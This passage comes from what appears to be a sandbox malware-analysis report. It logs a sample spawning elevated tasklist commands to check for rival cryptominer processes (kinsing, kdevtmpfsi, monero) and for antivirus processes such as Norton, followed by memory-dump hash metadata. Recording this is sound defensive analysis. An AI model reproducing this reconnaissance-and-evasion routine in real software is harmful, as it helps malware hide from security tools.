Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:11
Start time:05:02:53
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq dbused.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:12
Start time:05:02:53
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq kthreaddi.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:13
Start time:05:02:54
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq kdevtmpfsi.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:14
Start time:05:02:54
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq kinsing.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:15
Start time:05:02:54
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq gitlabw.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:16
Start time:05:02:55
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq monero.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:17
Start time:05:02:55
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq kthreaddw.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:05:02:55
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq ARestore.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:05:02:55
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq asOELnch.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:05:02:56
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq buVss.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:05:02:56
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq cltLMH.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:05:02:56
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq cltRT.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:05:02:56
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq coInst.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:05:02:56
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq coNatHst.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:05:02:57
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq CpySnpt.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:05:02:57
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq EFAInst64.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:05:02:58
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq elaminst.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:28
Start time:05:02:58
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq FLDgHost.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:29
Start time:05:02:59
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq InstCA.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:30
Start time:05:02:59
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq MCUI32.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:31
Start time:05:02:59
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq Navw32.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:32
Start time:05:02:59
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq ncolow.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:33
Start time:05:03:00
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq NortonSecurity.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:34
Start time:05:03:00
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq NSc.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:35
Start time:05:03:01
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq nsWscSvc.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:36
Start time:05:03:02
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq nuPerfScan.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:37
Start time:05:03:02
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq RuleUp.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:38
Start time:05:03:02
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq SEFInst.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:39
Start time:05:03:02
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq Sevntx64.exe"
Imagebase:0x7ff70ed00000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Reset < >
    Memory Dump Source
    • Source File: 00000001.00000002.3382025758.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
    • Associated: 00000001.00000002.3381991787.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.3382201433.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.3382375730.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.3382401622.0000000000B31000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.3382432954.0000000000B55000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.3382455987.0000000000B56000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.3382478582.0000000000B57000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.3382501643.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.3382525955.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.3382525955.0000000000B7A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.3382525955.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.3382525955.0000000000BE8000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.3382525955.0000000000BEC000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.3382525955.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.3382677724.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.3382703072.0000000000BFE000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.3382726840.0000000000BFF000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_6a0000_AI7f43Z7AC.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 07d72e8c4ef3cb1d486a9b3014eaac2eb9fc3ce190e5215e0fe856548d3e1b51
    • Instruction ID: da853f1092045ac55d0f2c55a1deea0143a18ae81607781211f6eabfcba86d6e
    • Opcode Fuzzy Hash: 07d72e8c4ef3cb1d486a9b3014eaac2eb9fc3ce190e5215e0fe856548d3e1b51
    • Instruction Fuzzy Hash: 9531992391CFC4C2D2218B24F5413AAB364F7A9784F15A315EFC812A1ADF38E2E5CB40
    Memory Dump Source
    • Source File: 00000001.00000002.3382025758.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
    • Associated: 00000001.00000002.3381991787.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.3382201433.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.3382375730.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.3382401622.0000000000B31000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.3382432954.0000000000B55000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.3382455987.0000000000B56000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.3382478582.0000000000B57000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.3382501643.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.3382525955.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.3382525955.0000000000B7A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.3382525955.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.3382525955.0000000000BE8000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.3382525955.0000000000BEC000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.3382525955.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.3382677724.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.3382703072.0000000000BFE000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.3382726840.0000000000BFF000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_6a0000_AI7f43Z7AC.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 19322aacc7dd447383d6f2170a10e82d5a65409c32a3e247da5a00b3a98942e9
    • Instruction ID: 22b1585d4513d02273babc0169ba2eac64e107925d3add76e5a179088c9ecdb4
    • Opcode Fuzzy Hash: 19322aacc7dd447383d6f2170a10e82d5a65409c32a3e247da5a00b3a98942e9
    • Instruction Fuzzy Hash: